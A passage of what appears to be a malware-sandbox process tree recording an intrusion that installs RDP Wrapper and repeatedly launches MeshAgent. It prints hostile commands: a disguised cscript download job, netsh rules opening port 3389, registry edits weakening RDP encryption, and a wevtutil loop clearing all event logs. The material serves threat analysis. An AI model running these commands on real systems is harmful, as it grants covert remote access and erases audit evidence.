                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:1100
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                    4⤵
                                                                                                                      PID:1748
                                                                                                                      • C:\Windows\system32\cscript.exe
                                                                                                                        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                        5⤵
                                                                                                                        • Blocklisted process makes network request
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:1712
                                                                                                                    • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                                      4⤵
                                                                                                                      • Server Software Component: Terminal Services DLL
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1240
                                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                        netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                        5⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:2404
                                                                                                                    • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
                                                                                                                      4⤵
                                                                                                                      • Server Software Component: Terminal Services DLL
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies WinLogon
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:2156
                                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                        5⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:5384
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                                      4⤵
                                                                                                                        PID:1936
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                                        4⤵
                                                                                                                          PID:2060
                                                                                                                        • C:\Windows\system32\findstr.exe
                                                                                                                          findstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                          4⤵
                                                                                                                            PID:3396
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping -n 1 google.com
                                                                                                                            4⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4032
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                            4⤵
                                                                                                                              PID:3232
                                                                                                                              • C:\Windows\system32\cscript.exe
                                                                                                                                cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                                5⤵
                                                                                                                                • Blocklisted process makes network request
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                PID:5324
                                                                                                                            • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                              "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                                              4⤵
                                                                                                                              • Server Software Component: Terminal Services DLL
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5708
                                                                                                                              • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                5⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                PID:2668
                                                                                                                            • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                              "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
                                                                                                                              4⤵
                                                                                                                              • Server Software Component: Terminal Services DLL
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies WinLogon
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2416
                                                                                                                              • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                5⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                PID:4636
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                                              4⤵
                                                                                                                                PID:2588
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                                                4⤵
                                                                                                                                  PID:5756
                                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                                  findstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                                  4⤵
                                                                                                                                    PID:576
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
                                                                                                                                2⤵
                                                                                                                                  PID:1668
                                                                                                                              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:4540
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:5988
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic os get oslanguage /FORMAT:LIST
                                                                                                                                  2⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:5272
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1836
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic os get oslanguage /FORMAT:LIST
                                                                                                                                  2⤵
                                                                                                                                    PID:756
                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                    2⤵
                                                                                                                                      PID:2400
                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                      2⤵
                                                                                                                                        PID:5148
                                                                                                                                    • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                      "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:1208
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic SystemEnclosure get ChassisTypes
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5384
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic os get oslanguage /FORMAT:LIST
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5436
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4876
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic SystemEnclosure get ChassisTypes
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:460
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5704
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                      1⤵
                                                                                                                                        PID:1020
                                                                                                                                      • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                        "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:1744
                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                          wmic SystemEnclosure get ChassisTypes
                                                                                                                                          2⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:908
                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                          wmic os get oslanguage /FORMAT:LIST
                                                                                                                                          2⤵
                                                                                                                                            PID:2676
                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3812
                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                                            2⤵
                                                                                                                                              PID:3404
                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                              2⤵
                                                                                                                                                PID:4544
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                              1⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:2764
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                              1⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:452
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                              1⤵
                                                                                                                                                PID:1080
                                                                                                                                              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:816
                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5060
                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                  wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3232
                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3352
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:6132
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1848
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                  1⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:5364
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                  1⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:5152
                                                                                                                                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                  "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:3332
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1764
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4532
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3260
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5260
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5428
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                  1⤵
                                                                                                                                                    PID:908
                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                    1⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:3148
                                                                                                                                                  • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                    "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:4728
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3364
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4188
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3024
                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                        wmic SystemEnclosure get ChassisTypes
                                                                                                                                                        2⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4476
                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                        2⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4908
                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4060
                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                        1⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:4904
                                                                                                                                                      • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                        "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:3944
                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                          wmic SystemEnclosure get ChassisTypes
                                                                                                                                                          2⤵
                                                                                                                                                            PID:884
                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                            wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                            2⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1908
                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                            2⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1080
                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                                                            2⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4876
                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                            2⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5188
                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5180
                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                            1⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:5780
                                                                                                                                                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:6068
                                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                              wmic SystemEnclosure get ChassisTypes
                                                                                                                                                              2⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4600
                                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                              wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4936
                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                2⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:3448
                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                2⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:4556
                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                2⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:3240
                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                              "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              PID:4552
                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                2⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5056
                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6052
                                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                  2⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5940
                                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                  2⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:4700
                                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:6108
                                                                                                                                                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                  "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:1836
                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                    2⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:3392
                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                    wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                    2⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:1380
                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5244
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:5548
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:1472
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:6036
                                                                                                                                                                  • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                    "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:2976
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3012
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:2928
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3136
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:456
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3056
                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:2804
                                                                                                                                                                  • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                    "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • System Location Discovery: System Language Discovery
